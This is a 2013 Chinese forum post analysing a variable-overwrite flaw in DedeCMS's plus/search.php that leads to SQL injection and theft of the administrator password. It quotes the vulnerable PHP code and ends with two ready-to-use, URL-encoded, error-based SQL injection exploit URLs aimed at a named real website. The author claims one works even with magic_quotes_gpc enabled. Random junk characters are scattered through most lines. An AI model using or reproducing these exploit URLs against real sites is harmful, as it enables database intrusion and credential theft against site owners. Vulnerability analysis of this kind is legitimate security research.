微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.4 n8 q+ ]/ h1 H& G/ I0 f6 ~+ c0 [
作者: c4rp3nt3r@0x50sec.org
% M1 X% a2 y' J7 @0 y$ `Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
4 E& A5 w: ?) M$ E, b6 H
# R1 v9 k2 G! t; K黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
- k k. @: y" k3 c( k) K$ D6 z
) b" B) P) R& C4 u: |============
, N- z7 w2 H4 T3 r: B
Q, ]$ r% D# E& Z0 G D
h# P9 G. a1 p. u) }; @1 pDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
# @6 v' U$ W2 u8 N5 |+ d . f/ h( D" O% R- ]6 Y4 F
require_once(dirname(__FILE__).”/../include/common.inc.php”);
# F, T" x+ t4 A& Z: F3 Rrequire_once(DEDEINC.”/arc.searchview.class.php”);' d, |6 g1 ?8 |9 \
- }+ Y5 x0 o0 r( _" k0 M; x1 u$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
" s9 E% z3 i g' _$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;7 u9 G# m1 J6 d: G) i) Y8 F
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;- ?% n1 Q+ C1 ~% i8 V5 b5 X6 f
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;. \9 b3 l% ]6 V J; t7 }& n
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;3 t" D* l& c$ g: C) V' m
X6 a) n5 }5 ^2 |* e d/ x
if(!isset($orderby)) $orderby=”;
) C, i) K# w$ g# ?( \else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);7 p4 Z! n) O' x# V/ L( {
+ w+ ^" o% l" z! ]6 @* I" r* M ; V; s& {- H8 @
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
7 y1 G4 v% v% F5 U& |else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);" n m5 s# g( J
' G7 {+ V6 d& k1 K% a
if(!isset($keyword)){
- ~* c8 v P) ]; u( G if(!isset($q)) $q = ”;$ R1 V1 {0 Q# D1 j' e3 E) K
$keyword=$q;
' ?" V7 D* U( Q2 Y4 U# i0 _}
3 Q" z" T; N# {. v6 J6 ? % M# }0 P) a* z3 J8 y, o6 G+ ^
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));! m3 `$ E# K, A7 e! X8 F
* H2 x$ q$ S2 s//查找栏目信息
" J" ^ T7 X2 V% ?2 V @' Aif(empty($typeid))
* b1 K+ I p1 @' h8 V7 w/ k{& A( n% W4 q: d. T" H% U( q4 m
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
5 R* |% ?7 G6 K e$ T if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ); G8 b0 K6 X ~- n
{4 ~% z7 G" ` {) `2 ^
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
' x- q; ^5 \8 A& M! x& H: k9 w fwrite($fp, “<”.”?php\r\n”);
u% ^; n/ u! F) r; P; ` $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
# `' H7 c- N( P O z n3 l $dsql->Execute();
! L3 X2 F; k* m4 h. | while($row = $dsql->GetArray()) \/ f; ^3 o& [/ C
{' M* V4 J4 l3 H* Y' X' w: A4 \
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
- n) o, S4 W# M5 @; x3 f }
. T. j0 _( @/ w/ x% n0 R fwrite($fp, ‘?’.'>’);
! A/ ?1 z3 D" b; g! D! s8 C8 y fclose($fp);
9 S$ F' F& V- @5 F }9 V( x0 d! \; O: _
//引入栏目缓存并看关键字是否有相关栏目内容 u. C# t# F. x6 i
require_once($typenameCacheFile);. @8 U. k# L) o9 g( s4 O7 d
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
- k/ c1 ]9 w5 T: w" Q9 P( E: }4 K( }. A//* v; v" X6 L! ?% Y: _% a
if(isset($typeArr) && is_array($typeArr))
% V! h( C* R8 U0 ] {
, f: G4 M* R* V6 j* x foreach($typeArr as $id=>$typename)
0 C# \- q0 Q8 t9 | {2 _, B: O! ?. L6 Z* Z- U! D
+ n$ ?0 k8 X" L" _ <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
; n' }; c) p' u4 Y' I if($keyword != $keywordn), ~' `* `2 L: H; l
{
( _# }6 {, O+ ~' `7 h $keyword = $keywordn;
9 C6 c( s$ }- C5 r <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
, N. C7 u9 D+ _4 R break;/ Y( n) O1 ~- r4 S
}3 X! |" T- i+ y) `4 \( o
}
! O+ {5 ]- C( R {* F }
7 E' N" G) w: o( _}
/ B) m! }8 B0 R' T然后plus/search.php文件下面定义了一个 Search类的对象 .8 c5 a- g/ q0 F
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
; w. D# V. a R0 h$this->TypeLink = new TypeLink($typeid);7 Z* d; z/ o; u7 \5 [9 ~& R O
8 a' g7 r* D/ J( P: p; }& C
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.( N5 J6 c9 y9 _/ d8 o3 q
# ~! t9 e5 O3 Y7 c6 Dclass TypeLink
# @9 A) t) j; @/ {& I% a2 f{! b4 @( l( t7 @7 C& _3 ?+ V4 h
var $typeDir;8 y/ q: D7 }$ a# S' d: B* w
var $dsql;4 ?$ N( r0 H. ?" Z0 V
var $TypeID;' h+ u5 } m/ m
var $baseDir;
8 ^' E9 O V/ _9 a- R4 g* k# { var $modDir;8 I' Z% \/ n# f' r: W; d( h, o$ F
var $indexUrl;! J$ l# _4 V' i
var $indexName;9 D1 W2 u+ R3 C
var $TypeInfos;. _7 ^. W9 L, b; n6 x, ~3 E
var $SplitSymbol;6 ?1 b" S' l$ o+ l8 d- G. s, c) }5 N
var $valuePosition;
$ O% q$ f# u# t {2 [ var $valuePositionName;
: e7 \8 F8 y X" Q; z, n var $OptionArrayList;//构造函数///////
1 W. M! M2 a$ j9 Z( E+ a //php5构造函数
2 f/ v% `- ^& U8 k function __construct($typeid)
9 _6 F: K# {! L( o2 K$ ]" a- E {
* j: z4 `; A5 w- h $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];, X. |- c( O3 m! y8 H
$this->indexName = $GLOBALS['cfg_indexname'];
( V! d/ i7 X9 b6 c. v4 @ $this->baseDir = $GLOBALS['cfg_basedir'];2 Z+ o# a+ _6 B
$this->modDir = $GLOBALS['cfg_templets_dir'];
9 N; i0 M1 x% ~( [- u7 m5 H $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];3 l5 U; G, {# a, y5 E8 L& u& V, [0 l
$this->dsql = $GLOBALS['dsql'];# f$ `! f; t- h3 s" N
$this->TypeID = $typeid;
! o9 R& @6 S9 u) N( {" X0 V $this->valuePosition = ”;
. Z8 {( w, M" r2 h$ ~' f9 [ $this->valuePositionName = ”;' P! z( q7 V. o7 i9 }
$this->typeDir = ”;
7 P% t" |1 {9 n) {" i7 T$ H% L $this->OptionArrayList = ”;5 f2 V$ C8 D0 j$ G: J/ q
2 }: w4 ^& E3 m7 L* y
//载入类目信息: y8 c# E2 G' b' U
! \& n4 y# X/ q8 ~! M* \; ^+ a* }
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
7 `4 P/ Z1 }0 K' I* f. u" a7 Pctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join, K# k N, J- h+ G$ U5 }
`#@__channeltype` ch# p e2 S) e$ W' a3 k
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
- }- H, J. W. ?# x% v5 j# X
! M5 {) N8 w$ y" U, Q/ ]0 l0 ] if($typeid > 0)
) |2 u ~) N: n1 h: u+ D2 T {; r4 Z# i5 v% ^. b P& A
$this->TypeInfos = $this->dsql->GetOne($query);: y: v4 y& Z1 w
利用代码一 需要 即使magic_quotes_gpc = Off4 B! Q( l% c) r. S
$ k4 Z/ t0 \. f6 q: T
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
3 I. ?$ Q# N# ~. g7 ?
: Q* i; r$ g# X* ?* f这只是其中一个利用代码… Search 类的构造函数再往下3 G& g, Y9 j+ F7 C0 L
: J' i) c7 x& F% g% [1 O1 I……省略2 A6 f0 \9 |' o9 l
$this->TypeID = $typeid;
4 n* A% F1 J& [& q4 C……省略
% K% P5 ~; V: z" Q" Q, V- xif($this->TypeID==”0″){9 ^+ k% l7 J8 k9 o* ^$ [
$this->ChannelTypeid=1;" B8 C6 ^/ w- t9 W6 F/ S3 z) p
}else{0 N0 x1 P: H1 u$ t( ^) m. V
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
M' d& Q+ E8 T//现在不鸡肋了吧亲…
0 Z4 K O8 r% q# u }: a $this->ChannelTypeid=$row['channeltype'];: C% D5 a( A- X( ~3 q+ U
0 B2 V8 `: {' o8 r1 v- R }/ m: d7 b! Z: v, W/ e
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.! Z z( R8 j0 s( |3 q
4 J6 e& Q+ C9 l/ U8 e& [& \( x' r& Bwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
0 T3 G$ g$ n" i* b, P n 5 q8 T8 w, S1 P& K5 i7 g
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
3 W# I* t- @: {9 S! ] |
发表于 2013-1-19 08:18:56
收藏
支持
反对